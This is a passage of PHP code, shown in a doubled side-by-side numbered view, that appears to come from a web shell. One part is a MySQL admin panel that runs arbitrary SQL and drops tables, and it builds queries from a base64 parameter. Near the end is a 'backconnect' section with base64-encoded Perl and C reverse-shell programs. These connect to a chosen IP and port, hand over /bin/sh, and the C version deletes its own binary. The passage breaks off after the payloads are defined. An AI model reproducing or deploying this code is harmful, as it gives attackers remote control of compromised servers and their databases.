993 p('<td>'.$row['Privileges'].'&nbsp;</td>'); 993 p('<td>'.$row['Privileges'].'&nbsp;</td>');
994 p('<td>'.$row['Comment'].'&nbsp;</td>'); 994 p('<td>'.$row['Comment'].'&nbsp;</td>');
995 p('</tr>'); 995 p('</tr>');
996 } 996 }
997 tbfoot(); 997 tbfoot();
998 $result = q("SHOW INDEX FROM $tablename"); 998 $result = q("SHOW INDEX FROM $tablename");
999 $rowdb = array(); 999 $rowdb = array();
1000 while($row = mysql_fetch_array($result)) { 1000 while($row = mysql_fetch_array($result)) {
1001 $rowdb[] = $row; 1001 $rowdb[] = $row;
1002 } 1002 }
1003 p('<h3>Indexes</h3>'); 1003 p('<h3>Indexes</h3>');
1004 p('<table border="0" cellpadding="3" cellspacing="0">'); 1004 p('<table border="0" cellpadding="3" cellspacing="0">');
1005 p('<tr class="head">'); 1005 p('<tr class="head">');
1006 p('<td>Keyname</td>'); 1006 p('<td>Keyname</td>');
1007 p('<td>Type</td>'); 1007 p('<td>Type</td>');
1008 p('<td>Unique</td>'); 1008 p('<td>Unique</td>');
1009 p('<td>Packed</td>'); 1009 p('<td>Packed</td>');
1010 p('<td>Seq_in_index</td>'); 1010 p('<td>Seq_in_index</td>');
1011 p('<td>Field</td>'); 1011 p('<td>Field</td>');
1012 p('<td>Cardinality</td>'); 1012 p('<td>Cardinality</td>');
1013 p('<td>Collation</td>'); 1013 p('<td>Collation</td>');
1014 p('<td>Null</td>'); 1014 p('<td>Null</td>');
1015 p('<td>Comment</td>'); 1015 p('<td>Comment</td>');
1016 p('</tr>'); 1016 p('</tr>');
1017 foreach ($rowdb as $row) { 1017 foreach ($rowdb as $row) {
1018 $thisbg = bg(); 1018 $thisbg = bg();
1019 p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">'); 1019 p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
1020 p('<td>'.$row['Key_name'].'</td>'); 1020 p('<td>'.$row['Key_name'].'</td>');
1021 p('<td>'.$row['Index_type'].'</td>'); 1021 p('<td>'.$row['Index_type'].'</td>');
1022 p('<td>'.($row['Non_unique'] ? 'No' : 'Yes').'&nbsp;</td>'); 1022 p('<td>'.($row['Non_unique'] ? 'No' : 'Yes').'&nbsp;</td>');
1023 p('<td>'.($row['Packed'] === null ? 'No' : $row['Packed']).'&nbsp;</td>'); 1023 p('<td>'.($row['Packed'] === null ? 'No' : $row['Packed']).'&nbsp;</td>');
1024 p('<td>'.$row['Seq_in_index'].'</td>'); 1024 p('<td>'.$row['Seq_in_index'].'</td>');
1025 p('<td>'.$row['Column_name'].($row['Sub_part'] ? '('.$row['Sub_part'].')' : '').'&nbsp;</td>'); 1025 p('<td>'.$row['Column_name'].($row['Sub_part'] ? '('.$row['Sub_part'].')' : '').'&nbsp;</td>');
1026 p('<td>'.($row['Cardinality'] ? $row['Cardinality'] : 0).'&nbsp;</td>'); 1026 p('<td>'.($row['Cardinality'] ? $row['Cardinality'] : 0).'&nbsp;</td>');
1027 p('<td>'.$row['Collation'].'&nbsp;</td>'); 1027 p('<td>'.$row['Collation'].'&nbsp;</td>');
1028 p('<td>'.$row['Null'].'&nbsp;</td>'); 1028 p('<td>'.$row['Null'].'&nbsp;</td>');
1029 p('<td>'.$row['Comment'].'&nbsp;</td>'); 1029 p('<td>'.$row['Comment'].'&nbsp;</td>');
1030 p('</tr>'); 1030 p('</tr>');
1031 } 1031 }
1032 tbfoot(); 1032 tbfoot();
1033 } elseif ($doing == 'insert' || $doing == 'edit') { 1033 } elseif ($doing == 'insert' || $doing == 'edit') {
1034 $result = q('SHOW COLUMNS FROM '.$tablename); 1034 $result = q('SHOW COLUMNS FROM '.$tablename);
1035 while ($row = mysql_fetch_array($result)) { 1035 while ($row = mysql_fetch_array($result)) {
1036 $rowdb[] = $row; 1036 $rowdb[] = $row;
1037 } 1037 }
1038 $rs = array(); 1038 $rs = array();
1039 if ($doing == 'insert') { 1039 if ($doing == 'insert') {
1040 p('<h2>Insert new line in '.$tablename.' table &raquo;</h2>'); 1040 p('<h2>Insert new line in '.$tablename.' table &raquo;</h2>');
1041 } else { 1041 } else {
1042 p('<h2>Update record in '.$tablename.' table &raquo;</h2>'); 1042 p('<h2>Update record in '.$tablename.' table &raquo;</h2>');
1043 $where = base64_decode($base64); 1043 $where = base64_decode($base64);
1044 $result = q("SELECT * FROM $tablename WHERE $where LIMIT 1"); 1044 $result = q("SELECT * FROM $tablename WHERE $where LIMIT 1");
1045 $rs = mysql_fetch_array($result); 1045 $rs = mysql_fetch_array($result);
1046 } 1046 }
1047 p('<form method="post" action="'.$self.'">'); 1047 p('<form method="post" action="'.$self.'">');
1048 p($dbform); 1048 p($dbform);
1049 makehide('action','mysqladmin'); 1049 makehide('action','mysqladmin');
1050 makehide('tablename',$tablename); 1050 makehide('tablename',$tablename);
1051 p('<table border="0" cellpadding="3" cellspacing="0">'); 1051 p('<table border="0" cellpadding="3" cellspacing="0">');
1052 foreach ($rowdb as $row) { 1052 foreach ($rowdb as $row) {
1053 if ($rs[$row['Field']]) { 1053 if ($rs[$row['Field']]) {
1054 $value = htmlspecialchars($rs[$row['Field']]); 1054 $value = htmlspecialchars($rs[$row['Field']]);
1055 } else { 1055 } else {
1056 $value = ''; 1056 $value = '';
1057 } 1057 }
1058 $thisbg = bg(); 1058 $thisbg = bg();
1059 p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">'); 1059 p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
1060 if ($row['Key'] == 'UNI' || $row['Extra'] == 'auto_increment' || $row['Key'] == 'PRI') { 1060 if ($row['Key'] == 'UNI' || $row['Extra'] == 'auto_increment' || $row['Key'] == 'PRI') {
1061 p('<td><b>'.$row['Field'].'</b><br />'.$row['Type'].'</td><td>'.$value.'&nbsp;</td></tr>'); 1061 p('<td><b>'.$row['Field'].'</b><br />'.$row['Type'].'</td><td>'.$value.'&nbsp;</td></tr>');
1062 } else { 1062 } else {
1063 p('<td><b>'.$row['Field'].'</b><br />'.$row['Type'].'</td><td><textarea class="area" name="insertsql['.$row['Field'].']" style="width:500px;height:60px;overflow:auto;">'.$value.'</textarea></td></tr>'); 1063 p('<td><b>'.$row['Field'].'</b><br />'.$row['Type'].'</td><td><textarea class="area" name="insertsql['.$row['Field'].']" style="width:500px;height:60px;overflow:auto;">'.$value.'</textarea></td></tr>');
1064 } 1064 }
1065 } 1065 }
1066 if ($doing == 'insert') { 1066 if ($doing == 'insert') {
1067 p('<tr class="'.bg().'"><td colspan="2"><input class="bt" type="submit" name="insert" value="Insert" /></td></tr>'); 1067 p('<tr class="'.bg().'"><td colspan="2"><input class="bt" type="submit" name="insert" value="Insert" /></td></tr>');
1068 } else { 1068 } else {
1069 p('<tr class="'.bg().'"><td colspan="2"><input class="bt" type="submit" name="update" value="Update" /></td></tr>'); 1069 p('<tr class="'.bg().'"><td colspan="2"><input class="bt" type="submit" name="update" value="Update" /></td></tr>');
1070 makehide('base64', $base64); 1070 makehide('base64', $base64);
1071 } 1071 }
1072 p('</table></form>'); 1072 p('</table></form>');
1073 } else { 1073 } else {
1074 $querys = @explode(';',$sql_query); 1074 $querys = @explode(';',$sql_query);
1075 foreach($querys as $num=>$query) { 1075 foreach($querys as $num=>$query) {
1076 if ($query) { 1076 if ($query) {
1077 p("<p><b>Query#{$num} : ".htmlspecialchars($query,ENT_QUOTES)."</b></p>"); 1077 p("<p><b>Query#{$num} : ".htmlspecialchars($query,ENT_QUOTES)."</b></p>");
1078 switch(qy($query)) 1078 switch(qy($query))
1079 { 1079 {
1080 case 0: 1080 case 0:
1081 p('<h2>Error : '.mysql_error().'</h2>'); 1081 p('<h2>Error : '.mysql_error().'</h2>');
1082 break; 1082 break;
1083 case 1: 1083 case 1:
1084 if (strtolower(substr($query,0,13)) == 'select * from') { 1084 if (strtolower(substr($query,0,13)) == 'select * from') {
1085 $allowedit = 1; 1085 $allowedit = 1;
1086 } 1086 }
1087 if ($getnumsql) { 1087 if ($getnumsql) {
1088 $tatol = mysql_num_rows(q($getnumsql)); 1088 $tatol = mysql_num_rows(q($getnumsql));
1089 $multipage = multi($tatol, $pagenum, $page, $tablename); 1089 $multipage = multi($tatol, $pagenum, $page, $tablename);
1090 } 1090 }
1091 if (!$tablename) { 1091 if (!$tablename) {
1092 $sql_line = str_replace(array("\r", "\n", "\t"), array(' ', ' ', ' '), trim(htmlspecialchars($query))); 1092 $sql_line = str_replace(array("\r", "\n", "\t"), array(' ', ' ', ' '), trim(htmlspecialchars($query)));
1093 $sql_line = preg_replace("/\/\*[^(\*\/)]*\*\//i", " ", $sql_line); 1093 $sql_line = preg_replace("/\/\*[^(\*\/)]*\*\//i", " ", $sql_line);
1094 preg_match_all("/from\s+`{0,1}([\w]+)`{0,1}\s+/i",$sql_line,$matches); 1094 preg_match_all("/from\s+`{0,1}([\w]+)`{0,1}\s+/i",$sql_line,$matches);
1095 $tablename = $matches[1][0]; 1095 $tablename = $matches[1][0];
1096 } 1096 }
1097 1097
1098 /*********************/ 1098 /*********************/
1099 $getfield = q("SHOW COLUMNS FROM $tablename"); 1099 $getfield = q("SHOW COLUMNS FROM $tablename");
1100 $rowdb = array(); 1100 $rowdb = array();
1101 $keyfied = ''; //主键字段 1101 $keyfied = ''; //主键字段
1102 while($row = @mysql_fetch_assoc($getfield)) { 1102 while($row = @mysql_fetch_assoc($getfield)) {
1103 $rowdb[$row['Field']]['Key'] = $row['Key']; 1103 $rowdb[$row['Field']]['Key'] = $row['Key'];
1104 $rowdb[$row['Field']]['Extra'] = $row['Extra']; 1104 $rowdb[$row['Field']]['Extra'] = $row['Extra'];
1105 if ($row['Key'] == 'UNI' || $row['Key'] == 'PRI') { 1105 if ($row['Key'] == 'UNI' || $row['Key'] == 'PRI') {
1106 $keyfied = $row['Field']; 1106 $keyfied = $row['Field'];
1107 } 1107 }
1108 } 1108 }
1109 /*********************/ 1109 /*********************/
1110 //直接浏览表按照主键降序排列 1110 //直接浏览表按照主键降序排列
1111 if ($keyfied && strtolower(substr($query,0,13)) == 'select * from') { 1111 if ($keyfied && strtolower(substr($query,0,13)) == 'select * from') {
1112 $query = str_replace(" LIMIT ", " order by $keyfied DESC LIMIT ", $query); 1112 $query = str_replace(" LIMIT ", " order by $keyfied DESC LIMIT ", $query);
1113 } 1113 }
1114 1114
1115 $result = q($query); 1115 $result = q($query);
1116 1116
1117 p($multipage); 1117 p($multipage);
1118 p('<table border="0" cellpadding="3" cellspacing="0">'); 1118 p('<table border="0" cellpadding="3" cellspacing="0">');
1119 p('<tr class="head">'); 1119 p('<tr class="head">');
1120 if ($allowedit) p('<td>Action</td>'); 1120 if ($allowedit) p('<td>Action</td>');
1121 $fieldnum = @mysql_num_fields($result); 1121 $fieldnum = @mysql_num_fields($result);
1122 for($i=0;$i<$fieldnum;$i++){ 1122 for($i=0;$i<$fieldnum;$i++){
1123 $name = @mysql_field_name($result, $i); 1123 $name = @mysql_field_name($result, $i);
1124 $type = @mysql_field_type($result, $i); 1124 $type = @mysql_field_type($result, $i);
1125 $len = @mysql_field_len($result, $i); 1125 $len = @mysql_field_len($result, $i);
1126 p("<td nowrap>$name<br><span>$type($len)".(($rowdb[$name]['Key'] == 'UNI' || $rowdb[$name]['Key'] == 'PRI') ? '<b> - PRIMARY</b>' : '').($rowdb[$name]['Extra'] == 'auto_increment' ? '<b> - Auto</b>' : '')."</span></td>"); 1126 p("<td nowrap>$name<br><span>$type($len)".(($rowdb[$name]['Key'] == 'UNI' || $rowdb[$name]['Key'] == 'PRI') ? '<b> - PRIMARY</b>' : '').($rowdb[$name]['Extra'] == 'auto_increment' ? '<b> - Auto</b>' : '')."</span></td>");
1127 } 1127 }
1128 p('</tr>'); 1128 p('</tr>');
1129 1129
1130 while($mn = @mysql_fetch_assoc($result)){ 1130 while($mn = @mysql_fetch_assoc($result)){
1131 $thisbg = bg(); 1131 $thisbg = bg();
1132 p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">'); 1132 p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
1133 $where = $tmp = $b1 = ''; 1133 $where = $tmp = $b1 = '';
1134 //选取条件字段用 1134 //选取条件字段用
1135 foreach($mn as $key=>$inside){ 1135 foreach($mn as $key=>$inside){
1136 if ($inside) { 1136 if ($inside) {
1137 //查找主键、唯一属性、自动增加的字段,找到就停止,否则组合所有字段作为条件。 1137 //查找主键、唯一属性、自动增加的字段,找到就停止,否则组合所有字段作为条件。
1138 if ($rowdb[$key]['Key'] == 'UNI' || $rowdb[$key]['Extra'] == 'auto_increment' || $rowdb[$key]['Key'] == 'PRI') { 1138 if ($rowdb[$key]['Key'] == 'UNI' || $rowdb[$key]['Extra'] == 'auto_increment' || $rowdb[$key]['Key'] == 'PRI') {
1139 $where = $key."='".addslashes($inside)."'"; 1139 $where = $key."='".addslashes($inside)."'";
1140 break; 1140 break;
1141 } 1141 }
1142 $where .= $tmp.$key."='".addslashes($inside)."'"; 1142 $where .= $tmp.$key."='".addslashes($inside)."'";
1143 $tmp = ' AND '; 1143 $tmp = ' AND ';
1144 } 1144 }
1145 } 1145 }
1146 //读取记录用 1146 //读取记录用
1147 foreach($mn as $key=>$inside){ 1147 foreach($mn as $key=>$inside){
1148 $b1 .= '<td nowrap>'.html_clean($inside).'&nbsp;</td>'; 1148 $b1 .= '<td nowrap>'.html_clean($inside).'&nbsp;</td>';
1149 } 1149 }
1150 $where = base64_encode($where); 1150 $where = base64_encode($where);
1151 1151
1152 if ($allowedit) p('<td nowrap><a href="javascript:editrecord(\'edit\', \''.$where.'\', \''.$tablename.'\');">Edit</a> | <a href="javascript:editrecord(\'del\', \''.$where.'\', \''.$tablename.'\');">Del</a></td>'); 1152 if ($allowedit) p('<td nowrap><a href="javascript:editrecord(\'edit\', \''.$where.'\', \''.$tablename.'\');">Edit</a> | <a href="javascript:editrecord(\'del\', \''.$where.'\', \''.$tablename.'\');">Del</a></td>');
1153 1153
1154 p($b1); 1154 p($b1);
1155 p('</tr>'); 1155 p('</tr>');
1156 unset($b1); 1156 unset($b1);
1157 } 1157 }
1158 p('<tr class="head">'); 1158 p('<tr class="head">');
1159 if ($allowedit) p('<td>Action</td>'); 1159 if ($allowedit) p('<td>Action</td>');
1160 $fieldnum = @mysql_num_fields($result); 1160 $fieldnum = @mysql_num_fields($result);
1161 for($i=0;$i<$fieldnum;$i++){ 1161 for($i=0;$i<$fieldnum;$i++){
1162 $name = @mysql_field_name($result, $i); 1162 $name = @mysql_field_name($result, $i);
1163 $type = @mysql_field_type($result, $i); 1163 $type = @mysql_field_type($result, $i);
1164 $len = @mysql_field_len($result, $i); 1164 $len = @mysql_field_len($result, $i);
1165 p("<td nowrap>$name<br><span>$type($len)".(($rowdb[$name]['Key'] == 'UNI' || $rowdb[$name]['Key'] == 'PRI') ? '<b> - PRIMARY</b>' : '').($rowdb[$name]['Extra'] == 'auto_increment' ? '<b> - Auto</b>' : '')."</span></td>"); 1165 p("<td nowrap>$name<br><span>$type($len)".(($rowdb[$name]['Key'] == 'UNI' || $rowdb[$name]['Key'] == 'PRI') ? '<b> - PRIMARY</b>' : '').($rowdb[$name]['Extra'] == 'auto_increment' ? '<b> - Auto</b>' : '')."</span></td>");
1166 } 1166 }
1167 p('</tr>'); 1167 p('</tr>');
1168 tbfoot(); 1168 tbfoot();
1169 p($multipage); 1169 p($multipage);
1170 break; 1170 break;
1171 case 2: 1171 case 2:
1172 $ar = mysql_affected_rows(); 1172 $ar = mysql_affected_rows();
1173 p('<h2>affected rows : <b>'.$ar.'</b></h2>'); 1173 p('<h2>affected rows : <b>'.$ar.'</b></h2>');
1174 break; 1174 break;
1175 } 1175 }
1176 } 1176 }
1177 } 1177 }
1178 } 1178 }
1179 } else { 1179 } else {
1180 $query = q("SHOW TABLE STATUS"); 1180 $query = q("SHOW TABLE STATUS");
1181 $table_num = $table_rows = $data_size = 0; 1181 $table_num = $table_rows = $data_size = 0;
1182 $tabledb = array(); 1182 $tabledb = array();
1183 while($table = mysql_fetch_array($query)) { 1183 while($table = mysql_fetch_array($query)) {
1184 $data_size = $data_size + $table['Data_length']; 1184 $data_size = $data_size + $table['Data_length'];
1185 $table_rows = $table_rows + $table['Rows']; 1185 $table_rows = $table_rows + $table['Rows'];
1186 $table['Data_length'] = sizecount($table['Data_length']); 1186 $table['Data_length'] = sizecount($table['Data_length']);
1187 $table_num++; 1187 $table_num++;
1188 $tabledb[] = $table; 1188 $tabledb[] = $table;
1189 } 1189 }
1190 $data_size = sizecount($data_size); 1190 $data_size = sizecount($data_size);
1191 unset($table); 1191 unset($table);
1192 p('<table border="0" cellpadding="0" cellspacing="0">'); 1192 p('<table border="0" cellpadding="0" cellspacing="0">');
1193 p('<form action="'.$self.'" method="POST">'); 1193 p('<form action="'.$self.'" method="POST">');
1194 makehide('action','mysqladmin'); 1194 makehide('action','mysqladmin');
1195 p($dbform); 1195 p($dbform);
1196 p('<tr class="head">'); 1196 p('<tr class="head">');
1197 p('<td width="2%" align="center">&nbsp;</td>'); 1197 p('<td width="2%" align="center">&nbsp;</td>');
1198 p('<td>Name</td>'); 1198 p('<td>Name</td>');
1199 p('<td>Rows</td>'); 1199 p('<td>Rows</td>');
1200 p('<td>Data_length</td>'); 1200 p('<td>Data_length</td>');
1201 p('<td>Create_time</td>'); 1201 p('<td>Create_time</td>');
1202 p('<td>Update_time</td>'); 1202 p('<td>Update_time</td>');
1203 if ($highver) { 1203 if ($highver) {
1204 p('<td>Engine</td>'); 1204 p('<td>Engine</td>');
1205 p('<td>Collation</td>'); 1205 p('<td>Collation</td>');
1206 } 1206 }
1207 p('<td>Operate</td>'); 1207 p('<td>Operate</td>');
1208 p('</tr>'); 1208 p('</tr>');
1209 foreach ($tabledb as $key => $table) { 1209 foreach ($tabledb as $key => $table) {
1210 $thisbg = bg(); 1210 $thisbg = bg();
1211 p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">'); 1211 p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
1212 p('<td align="center" width="2%"><input type="checkbox" name="table[]" value="'.$table['Name'].'" /></td>'); 1212 p('<td align="center" width="2%"><input type="checkbox" name="table[]" value="'.$table['Name'].'" /></td>');
1213 p('<td><a href="javascript:settable(\''.$table['Name'].'\');">'.$table['Name'].'</a></td>'); 1213 p('<td><a href="javascript:settable(\''.$table['Name'].'\');">'.$table['Name'].'</a></td>');
1214 p('<td>'.$table['Rows'].'</td>'); 1214 p('<td>'.$table['Rows'].'</td>');
1215 p('<td>'.$table['Data_length'].'</td>'); 1215 p('<td>'.$table['Data_length'].'</td>');
1216 p('<td>'.$table['Create_time'].'&nbsp;</td>'); 1216 p('<td>'.$table['Create_time'].'&nbsp;</td>');
1217 p('<td>'.$table['Update_time'].'&nbsp;</td>'); 1217 p('<td>'.$table['Update_time'].'&nbsp;</td>');
1218 if ($highver) { 1218 if ($highver) {
1219 p('<td>'.$table['Engine'].'</td>'); 1219 p('<td>'.$table['Engine'].'</td>');
1220 p('<td>'.$table['Collation'].'</td>'); 1220 p('<td>'.$table['Collation'].'</td>');
1221 } 1221 }
1222 p('<td><a href="javascript:settable(\''.$table['Name'].'\', \'insert\');">Insert</a> | <a href="javascript:settable(\''.$table['Name'].'\', \'structure\');">Structure</a> | <a href="javascript:settable(\''.$table['Name'].'\', \'drop\');">Drop</a></td>'); 1222 p('<td><a href="javascript:settable(\''.$table['Name'].'\', \'insert\');">Insert</a> | <a href="javascript:settable(\''.$table['Name'].'\', \'structure\');">Structure</a> | <a href="javascript:settable(\''.$table['Name'].'\', \'drop\');">Drop</a></td>');
1223 p('</tr>'); 1223 p('</tr>');
1224 } 1224 }
1225 p('<tr class="head">'); 1225 p('<tr class="head">');
1226 p('<td width="2%" align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td>'); 1226 p('<td width="2%" align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td>');
1227 p('<td>Name</td>'); 1227 p('<td>Name</td>');
1228 p('<td>Rows</td>'); 1228 p('<td>Rows</td>');
1229 p('<td>Data_length</td>'); 1229 p('<td>Data_length</td>');
1230 p('<td>Create_time</td>'); 1230 p('<td>Create_time</td>');
1231 p('<td>Update_time</td>'); 1231 p('<td>Update_time</td>');
1232 if ($highver) { 1232 if ($highver) {
1233 p('<td>Engine</td>'); 1233 p('<td>Engine</td>');
1234 p('<td>Collation</td>'); 1234 p('<td>Collation</td>');
1235 } 1235 }
1236 p('<td>Operate</td>'); 1236 p('<td>Operate</td>');
1237 p('</tr>'); 1237 p('</tr>');
1238 p('<tr class='.bg().'>'); 1238 p('<tr class='.bg().'>');
1239 p('<td>&nbsp;</td>'); 1239 p('<td>&nbsp;</td>');
1240 p('<td>Total tables: '.$table_num.'</td>'); 1240 p('<td>Total tables: '.$table_num.'</td>');
1241 p('<td>'.$table_rows.'</td>'); 1241 p('<td>'.$table_rows.'</td>');
1242 p('<td>'.$data_size.'</td>'); 1242 p('<td>'.$data_size.'</td>');
1243 p('<td colspan="'.($highver ? 5 : 3).'">&nbsp;</td>'); 1243 p('<td colspan="'.($highver ? 5 : 3).'">&nbsp;</td>');
1244 p('</tr>'); 1244 p('</tr>');
1245 1245
1246 p("<tr class=\"".bg()."\"><td colspan=\"".($highver ? 9 : 7)."\"><input name=\"saveasfile\" value=\"1\" type=\"checkbox\" /> Save as file <input class=\"input\" name=\"path\" value=\"".SA_ROOT.$dbname.".sql\" type=\"text\" size=\"60\" /> <input class=\"bt\" type=\"submit\" value=\"Export selection table\" /></td></tr>"); 1246 p("<tr class=\"".bg()."\"><td colspan=\"".($highver ? 9 : 7)."\"><input name=\"saveasfile\" value=\"1\" type=\"checkbox\" /> Save as file <input class=\"input\" name=\"path\" value=\"".SA_ROOT.$dbname.".sql\" type=\"text\" size=\"60\" /> <input class=\"bt\" type=\"submit\" value=\"Export selection table\" /></td></tr>");
1247 makehide('doing','backupmysql'); 1247 makehide('doing','backupmysql');
1248 formfoot(); 1248 formfoot();
1249 p("</table>"); 1249 p("</table>");
1250 fr($query); 1250 fr($query);
1251 } 1251 }
1252 } 1252 }
1253 } 1253 }
1254 tbfoot(); 1254 tbfoot();
1255 @mysql_close(); 1255 @mysql_close();
1256}//end mysql 1256}//end mysql
1257 1257
1258elseif ($action == 'backconnect') { 1258elseif ($action == 'backconnect') {
1259 !$yourip && $yourip = $_SERVER['REMOTE_ADDR']; 1259 !$yourip && $yourip = $_SERVER['REMOTE_ADDR'];
1260 !$yourport && $yourport = '12345'; 1260 !$yourport && $yourport = '12345';
1261 $usedb = array('perl'=>'perl','c'=>'c'); 1261 $usedb = array('perl'=>'perl','c'=>'c');
1262 1262
1263 $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj". 1263 $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
1264 "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR". 1264 "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
1265 "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT". 1265 "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
1266 "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI". 1266 "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
1267 "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi". 1267 "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
1268 "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl". 1268 "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
1269 "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; 1269 "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
1270 $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC". 1270 $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC".
1271 "BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb". 1271 "BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb".
1272 "SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd". 1272 "SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd".
1273 "KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ". 1273 "KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ".
1274 "sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC". 1274 "sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC".
1275 "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D". 1275 "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D".
1276 "QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp". 1276 "QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp".
1277 "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; 1277 "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
1278 1278
1279 if ($start && $yourip && $yourport && $use){ 1279 if ($start && $yourip && $yourport && $use){
1280 if ($use == 'perl') { 1280 if ($use == 'perl') {
